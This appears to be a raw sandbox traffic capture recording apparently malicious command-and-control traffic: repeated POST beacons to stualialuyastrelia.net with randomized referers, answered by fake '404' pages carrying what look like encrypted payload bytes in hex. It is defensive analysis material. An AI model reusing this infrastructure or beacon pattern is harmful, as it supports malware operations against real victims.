Dec 24, 2023 10:44:18.546128988 CET	273	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 f6 e1 31 f9 Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bO17l0$DeG*>PGQd;)6yR}%3MB(4PypcR4Oizl x5"_&wfTu5x)=~,bQR9C]
Dec 24, 2023 10:44:18.838449955 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:18 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 18 00 00 00 1f 3d 53 a8 37 66 30 7c 67 57 e9 d9 8c f4 ed 35 70 40 c7 45 89 0c 8a a1 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 8b 3e 6c 0d a7 1b 52 86 af 2f 77 aa 83 0a 43 00 39 77 0d e0 2f 81 e6 89 73 59 a7 7d 68 54 09 6d 9a 1d 31 84 ec ba e2 a7 40 9f 98 15 d4 f0 30 2a 63 2f 26 3c c7 4d 8c 99 39 6c 3d 53 47 c2 9e 39 be 29 8d 28 26 61 f2 3c 8d ce 02 b5 cf 78 62 e5 a5 c1 90 5c 2d ab ee 05 93 38 52 fe 4e 35 05 dc 44 49 ab a0 3f 72 54 62 f6 a4 60 d1 17 4b 2b 97 4b 52 9a 18 6b 6f 52 3a dc ee 4b ce a5 5c 42 10 ea f6 7a fe 3c b9 4c 8c 72 cf 3f 43 a1 b2 6f 0a 0a ca 4e 25 6f 4c 3a 3d b2 5c e8 84 fd bc 6d e2 dc a1 a7 f4 73 93 20 fc 0c 82 88 12 f7 a3 ef 06 14 ad 02 3a 46 8a 0d a9 07 fa 67 45 f6 23 fc 4b 2c be 78 bf 55 36 4c 3d f5 3c 42 3e 7d e8 28 7a 3a 34 d7 41 b4 90 2c a6 59 58 e5 62 09 eb 95 5a b7 ba c5 09 16 be 03 bb 2b 37 b1 3e a1 b3 1b c7 8b ef 77 04 77 3f 6c df 89 82 9b 28 97 e9 b0 ea 24 de c0 49 60 55 8c df 1a 73 e8 78 31 3e 8b 58 94 82 3e 37 59 63 c3 36 e3 3a 2f b3 b6 09 fb 7f f3 8f 1b fc 26 28 bc fd 33 3f 89 5e bf f1 0e 63 62 99 63 9d 20 36 fe f0 a2 86 2c 4b 78 f2 b4 2c d4 ce 13 c4 2d ca 95 3a d9 64 6d 54 b3 5c 76 2c 4e 89 f7 3d 58 4d f5 12 8b 75 0c f8 cd 2b 7d 30 c0 2b fe 21 2a 7f 15 6d 3f 16 9e 01 b5 69 eb 9d ed 8d ee 41 d5 45 24 19 4b 1f 52 f1 9d 79 17 9b a4 e5 ab ea fc 39 44 e6 f0 63 b3 34 62 01 f0 92 0e 5e fc fd 8a c8 9b 10 5f 47 d8 54 31 a2 2b c6 4d 36 cd 60 df d8 4f c5 44 25 78 20 ef 1b 08 ad 5d 35 d1 7a 05 c7 57 dd b3 46 91 4a 01 92 a0 31 f3 b6 5f 99 74 c0 c9 f3 12 b1 02 66 86 b1 ad f1 8b 14 d9 ea 1a 24 e9 4e d1 15 f3 a9 1c c4 16 d5 e6 00 a7 09 17 b6 de 40 6b c3 fd cf f3 3b 5b 4a 76 fb 4d fa 6a d1 2c c1 e0 7e 1b 2b c0 11 6e b8 9d 9a fa 03 03 c5 6c 91 63 12 49 53 b1 0f 30 36 77 1f f7 e6 87 ad 05 de 93 db fc 4e f1 69 be e5 e3 9e e3 56 da ef ef 8a c8 40 39 ae 15 4f ce b3 12 7c 8e 6a 18 41 66 35 99 7e 83 84 08 cd ee cf cd 9b da 0d 58 73 6c 8a 96 03 37 fa 43 43 fe a8 50 75 48 e9 60 17 4c aa 25 df a1 a9 6a b9 d6 d6 a4 62 e8 a9 b7 76 79 f1 50 93 7c 2c e6 d0 49 56 e1 d6 47 59 19 7d 27 84 22 66 13 de 9e 1f a0 7c 85 2b dc ef 24 3b 92 33 8d a6 52 d2 8e 29 80 d0 f3 4f b5 e2 72 22 4d 9a 70 ea 84 bd 7e 69 94 5b c4 f6 01 42 7c ee a7 84 cd 7a 58 39 62 79 cf f7 6f e9 d6 eb 85 59 0e 75 06 d1 04 8d d7 af 40 60 76 57 c4 2d 70 c6 b0 57 ad 50 f1 57 80 a0 a2 04 10 a1 2f 49 6d 26 b4 91 24 df 14 8f b6 65 b1 49 70 9f 31 03 96 8c 54 0a 5b 2c 95 a1 8e bd 1f f3 f5 56 7e 79 48 59 a9 3d 78 ed 6f 4f 33 13 20 7a ad f0 83 08 17 2f f1 27 a6 d0 f2 c0 9d 2a 19 c8 4b 73 42 fb 6d 8e 46 46 5e 76 11 29 3e c1 4b 58 80 22 17 75 a5 9a cb a2 29 73 76 ff 45 a7 3e 33 23 bd eb 32 16 b9 e2 67 6e f1 5c 47 79 b8 5a de 69 7e 2e bf 3c 4d bb fb 2a 1b c5 0c e4 c6 60 15 56 38 18 d5 f9 83 7f a0 63 2f d2 f0 46 65 73 fe 74 89 c7 8b 39 3e db 7d 26 f1 9c 20 e5 d4 19 85 0e 0c 22 4b 08 f1 72 8e 91 31 8c 96 e7 6c f0 0e 8c 92 98 23 9c d0 f4 a2 22 95 79 ad ce ab 6e 3e 6f 41 03 5a 3a 9a 95 d0 37 fb 9a d3 c8 f4 ce fb 4e 34 c8 e9 fc 81 7d 09 69 48 c2 51 34 c8 80 56 30 90 62 42 15 4d 94 8d 70 58 ca 82 cd ca 50 85 73 ba 57 b4 49 5d a5 0c 36 7c 83 c6 7d b7 dd 34 16 96 9c e6 03 4d 95 bf a4 56 a4 5e 0d 3c 90 c5 d0 f5 93 fc 59 fe 37 8d 84 3b 7a 0d 21 42 ad ec 32 91 72 d6 70 e7 13 d5 b4 a0 15 fc 01 dd dc 99 a7 49 7c 2b 04 07 27 89 89 72 3c 26 42 c1 db a2 96 1f d8 29 e9 38 70 78 f1 df 3e c7 fb 0b 6a a9 Data Ascii: 1f66=S7f0\|gW5p@E74o8>lR/wC9w/sY}hTm1@0c/&<M9l=SG9)(&a<xb\-8RN5DI?rTb`K+KRkoR:K\Bz<Lr?CoN%oL:=\ms :FgE#K,xU6L=<B>}(z:4A,YXbZ+7>ww?l($I`Usx1>X>7Yc6:/&(3?^cbc 6,Kx,-:dmT\v,N=XMu+}0+!m?iAE$KRy9Dc4b^_GT1+M6`OD%x ]5zWFJ1_tf$N@k;[JvMj,~+nlcIS06wNiV@9O\|jAf5~Xsl7CCPuH`L%jbvyP\|,IVGY}'"f\|+$;3R)Or"Mp~i[B\|zX9byoYu@`vW-pWPW/Im&$eIp1T[,V~yHY=xoO3 z/'KsBmFF^v)>KX"u)svE>3#2gn\GyZi~.<M`V8c/Fest9>}& "Kr1l#"yn>oAZ:7N4}iHQ4V0bBMpXPsWI]6\|}4MV^<Y7;z!B2rpI\|+'r<&B)8px>j
Dec 24, 2023 10:44:18.838494062 CET	1286	IN	Data Raw: 20 b5 83 8f ce c8 66 c5 57 bf b8 da a6 60 38 92 c4 04 f6 cc 46 bd 8a 94 a0 75 c2 1e 20 75 c2 9e a2 e5 8b 43 a3 3d c2 11 a2 a1 3e aa d0 63 97 97 8c 7c 09 4d de d5 1f e8 32 6c 17 91 cd a6 b1 ef 6a bb 2c 61 3c a3 64 65 32 0b b0 07 9a 5a a7 0a 52 44 Data Ascii: fW`8Fu uC=>c\|M2lj,a<de2ZRD@7I~2Xwc`cs&)2G(Nn.X4gx?04rMo[;KX06}]pU]%(9g]F[!'if\Ts)z
Dec 24, 2023 10:44:18.838536024 CET	1286	IN	Data Raw: 96 63 fd 15 63 42 c2 68 9a 8e 32 09 24 6a 18 ac 94 67 d9 21 1c e5 b3 35 16 f1 20 6b bb ed 7e e2 e0 c3 89 5c 2f 86 38 6d e5 35 c5 2a 33 ab b5 af db 01 e8 f6 1e ba 4c 58 f8 c4 54 7e 45 89 54 7e d6 f0 13 e6 7e ca fb 0d 3b cb 4b c4 4d b5 6d 84 f2 bb Data Ascii: ccBh2$jg!5 k~\/8m5*3LXT~ET~~;KMm{8lN4P<mpdhKcgJq4.]R8ej965ck1DsM%P^e)-5W:66$7'}Lj[3;9Oyyw;3W1b()
Dec 24, 2023 10:44:18.838613987 CET	1286	IN	Data Raw: f8 8c fe af 93 87 52 0a 60 74 1d e5 8f 0c f4 23 60 2e 0a 8f fe 46 9c 23 72 df 43 cb 1d 75 d7 59 e5 79 d6 c3 20 68 bb 5f 88 af fa 3e aa 25 70 fe 63 8c a9 96 08 cb cf 36 26 d0 06 9d 5b d1 97 e9 d1 7e 9e 1a 64 16 c3 25 57 9b 12 3e d0 8b 43 76 44 39 Data Ascii: R`t#`.F#rCuYy h_>%pc6&[~d%W>CvD99@l(\e-U #nm,Z\|I W];,B1z~6F Kz}fF 4v9k`HZ/O=Iy1 o>kCT\|?+hkq+R<`6
Dec 24, 2023 10:44:18.838677883 CET	1286	IN	Data Raw: ff 6f 02 f6 2f 2d 90 e2 e6 dd ab 7a a6 da d8 dd 7f cc ba e6 bb 6c b6 fc 1a 83 25 81 96 69 c0 be 97 ed c3 b2 07 73 e7 69 92 a1 3b 73 30 93 b7 36 d6 c9 f3 c7 e3 2e f1 bd cb 0f 61 a0 0a 97 9e 40 5b 5d 23 27 4d 30 31 5f 56 eb 52 fa db 74 ce 6b c7 a6 Data Ascii: o/-zl%isi;s06.a@[]#'M01_VRtkCuv.`lC3M.QdvL_KKo T:>t&^]b-6I_Shah*#\|sW[M:w0F%$yJ>3t\jS\Z!
Dec 24, 2023 10:44:18.838704109 CET	1286	IN	Data Raw: 38 ca 47 40 42 3c 2d e0 9f d1 21 78 38 fb 0d a1 18 5d 14 f5 c9 3a e6 2b e0 95 93 40 cb c8 24 a1 3d fd e8 f3 2b 84 3f d5 6a 1c 15 e8 1e 1a a3 17 33 2c 5a 1f 23 1a 81 2c 71 81 7b 99 ef 8d df 82 9b 69 4e cb 1c 44 24 48 3e 58 b2 2d 88 8f 54 5f f8 d6 Data Ascii: 8G@B<-!x8]:+@$=+?j3,Z#,q{iND$H>X-T_HNf]~B\|Zjx)R\|y2DBR B*Vuqm^ATQ`oVP"oXFwCf-%{+)27O_on]2Ozmw
Dec 24, 2023 10:44:18.838778019 CET	1286	IN	Data Raw: 1b c8 af d6 5e 17 b7 e1 60 fc e9 f8 25 b2 53 d4 f8 1b f0 d4 dd 79 a9 0e cc 03 68 df 76 a8 57 3a ef 8e 06 3c fe fd 2e 1d bd dd ec 83 a3 13 95 99 f5 20 f8 84 5f ac 3f 83 90 d8 f7 b4 db 8c 62 cb 0e 09 f5 0a 08 90 17 85 b3 18 b4 85 60 ed 0c c4 16 d4 Data Ascii: ^`%SyhvW:<. _?b`%h8!?5qIZYv~]8HKgLufxV#sf]:rWWAc:=z[7cS8t~s/ht,txuWHEHYzHZ
Dec 24, 2023 10:44:18.838845015 CET	1286	IN	Data Raw: 69 1e 79 51 23 c4 46 9f 19 ca b8 28 f5 98 c1 e3 1d b8 dd c8 35 9f 98 d3 6e 55 80 6e 66 7a 91 fd e6 42 d8 31 94 c5 8c 53 98 ce 85 80 a6 2c b2 91 9e 9f fd e3 f4 42 b3 db 64 f3 e0 22 04 65 94 51 15 43 ce 5d 19 c8 3e 8c 31 d7 d2 01 01 43 b5 6d 9d a1 Data Ascii: iyQ#F(5nUnfzB1S,Bd"eQC]>1CmB1Jq^vvh`+"?%HjBB_hv[3f\X:,'B?#)K;VdpW4R=sA^g%1\<Gy
Dec 24, 2023 10:44:18.838915110 CET	1286	IN	Data Raw: 1e f9 2f dc 67 49 e8 0b 98 33 a7 4e dd dd 24 35 ca 3f 73 8e 0a 43 8f a2 8c 6f 94 9f 0a ee 8b b2 00 f7 9a 7a 75 24 de bc ee ac a2 6c 54 68 1a ac d7 20 1c cf 01 83 da d0 7d 3b 4f 56 15 f2 09 a2 b4 8c 2c b4 cb af 34 c0 3c a5 16 03 22 0b d1 f4 90 12 Data Ascii: /gI3N$5?sCozu$lTh };OV,4<"\|,ulfJE\|SN0(g_"UXT_J<Zzy%/R,?u\d< JMY0yJEyep7v2l6J]XPxvB+Upf]hV\$r+2
Dec 24, 2023 10:44:18.838941097 CET	1286	IN	Data Raw: aa 02 c0 2f b9 32 2f 7b ff 3e c6 b2 c9 17 74 f1 7e 7e 80 c7 f4 ef 7a d7 dd 0b 67 0a ce 39 0c a9 ec ef 8a 1e d4 97 c8 74 62 e0 91 c6 f8 52 3a 50 aa d9 ff 58 73 c1 c5 44 a2 c4 12 cf 72 29 11 aa 5d 1c 3b b8 41 fe ec 9f ec 98 f0 79 3b 6f 5d 68 f3 a5 Data Ascii: /2/{>t~~zg9tbR:PXsDr)];Ay;o]hDXGligPPK/#[N,]=AwGx(SSAzlyXBl'`?)VgLS\|&Wee\|WU!rivBGA?~,cx
Dec 24, 2023 10:44:20.017792940 CET	279	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rkcmcblyxglr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 243 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:20.310698032 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:20 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f4 ff a9 71 a2 b8 c4 0d 13 13 bf 1e e1 92 c4 08 4c c4 08 a0 c1 a1 61 76 df f5 69 21 11 14 7e 5f af 9a 30 1d c9 a0 c1 a9 dd 7a 0d b0 4f 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9f d4 3f 7c 88 28 c8 48 6e a1 c1 4a 9a 03 fd ec 9e ea 72 af 87 2b bd 61 f7 b5 42 bf 44 34 fd 78 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae 64 9b 03 4c 49 56 ad f3 57 7b 2d ba 72 19 cd 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 e7 50 7b 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 f7 3d 66 49 8b 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 c4 2e e6 5b 1e 44 ab 1e 26 75 10 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 81 7e 90 c7 7d 10 9f c0 ad df b3 99 27 98 8a cd 22 64 74 79 5c 6c 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 7b 2f 08 64 5a b1 ae 46 1f d0 56 ab 7a 8f b6 6c e0 cd 28 d8 37 00 52 ff 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 3e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d ed 26 2a 77 31 cc 01 45 2d 76 25 0d 3a e4 66 f9 45 d7 ee fe 9f ff a9 01 55 29 59 c5 7b 10 ac d6 d2 4c 7d 20 ef bd ce dd 11 83 28 02 f9 86 30 99 7b 1c 00 6e f5 21 11 72 36 a2 f5 ae f2 57 28 fb f2 b7 23 40 78 d1 6e 02 dd dc 04 81 33 Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGjT05sq733hsE\|WD<P5Q"f=(jC\SMUdT[Up"XJ3Ob>!Z:V?#BSSR+{2DqLavi!~_0zO,'Qa?\|(HnJr+aBD4xl#l)l~qxJO;ydLIVW{-r#u1yr+Lc1<'i3FHU=hU@P{9&(B@w=fId0QpKk^NTUc).[D&uWL\h)^cu~}'"dty\lCbzk{/dZFVzl(7R RH:M>Mpvn%.5_)CCUb:@3%}/#wRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=&*w1E-v%:fEU)Y{L} (0{n!r6W(#@xn3
Dec 24, 2023 10:44:24.260106087 CET	278	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xaqntkatthh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 264 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:24.551748991 CET	599	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:24 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Dec 24, 2023 10:44:24.554912090 CET	280	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vfqbofxnlmres.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 114 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:24.846551895 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:24 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 22 bc aa 0f 3b 23 bc 66 97 73 47 aa 4b e0 9b 69 d0 72 29 48 8a de 76 60 43 c6 b2 eb 6a 10 9d a9 72 1d 5e df 4f 38 f9 de 17 09 6b a6 ea 12 ff 64 b5 05 16 e5 23 41 93 b2 89 f2 4e 47 6a 99 75 d9 b2 29 69 3c 71 d1 e3 cf c7 e4 6b c1 41 72 b7 4a bf 6c 13 d9 aa 05 f6 d0 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 55 53 13 2b 3d fa 1d 09 52 2b e5 8d 83 7b 9e 45 f4 fe 73 8c 5c db c4 21 1d 13 bf c0 e0 92 24 08 4f c5 73 be cb a1 61 6e de f5 69 f9 17 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4e 19 e0 2c 95 a9 1d 1a f5 96 be 25 51 61 9a 64 28 7c 88 2c c8 48 62 cd d0 4a 98 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 c7 ed fb 1a 38 9b 4a d8 19 ae c3 4f cb 5e 83 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 1b ac c2 46 c1 48 15 ac 4f 8f d7 55 7d af ba 68 92 0e ff 9d 7f 7f 55 40 57 24 75 39 42 e5 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 19 74 af 90 4e b1 54 55 a5 a2 b9 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 6f e1 7e a0 3d 68 91 7e 10 06 f1 2c 1e a0 03 5b df 1f e4 a6 4d 1e 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 03 e2 dd ea ff 80 62 7a d7 60 df c3 e0 2b 29 ba bb 01 5e 17 28 d2 c4 48 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 dc e7 54 99 21 48 c4 3a 96 ec ca e7 17 3f 3c eb 7e 4d a4 70 d4 03 65 a2 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 67 23 c5 a5 ad 3a 29 43 43 dd 57 03 62 18 ca 13 f8 40 ae ae 88 c1 54 af 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 cb 23 1e 6c 36 ca 04 c1 6d 93 81 19 e3 2f be 8c f5 18 98 52 b9 e9 eb 9e 13 7c b6 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 5a 9e 8b 58 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d d8 c6 c2 2c 9e ce 00 89 f1 b5 e8 c1 d2 27 ab 35 a4 36 6c 12 c5 2d b4 25 d7 d5 f3 c8 07 9c 69 de 85 8f 83 05 9f f2 81 dd 56 a9 e5 42 73 89 ce bc 6d 53 4f 6e fe 0b d4 32 86 ad 0b 8b 24 07 67 fb 27 82 4e 00 0c c1 90 27 91 8c 4b 81 aa Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShG";#fsGKir)Hv`Cjr^O8kd#ANGju)i<qkArJl3Ob>!Z:V?sBUS+=R+{Es\!$Osani~_TzN,%Qad(\|,HbJlk?aMF$l3l9\|~q8JO^LuVW;r#u1yr+Lc1<'iFHOU}hU@W$u9B(B@w=fd0QpKtNTUo)2([T&}Wbo~=h~,[Mt9Pmbz`+)^(Hzk7@T!H:?<~Mpevn%.ug#:)CCWb@T3%}/#l6m/R\|LEsCRZXW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9*nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=,'56l-%iVBsmSOn2$g'N'K
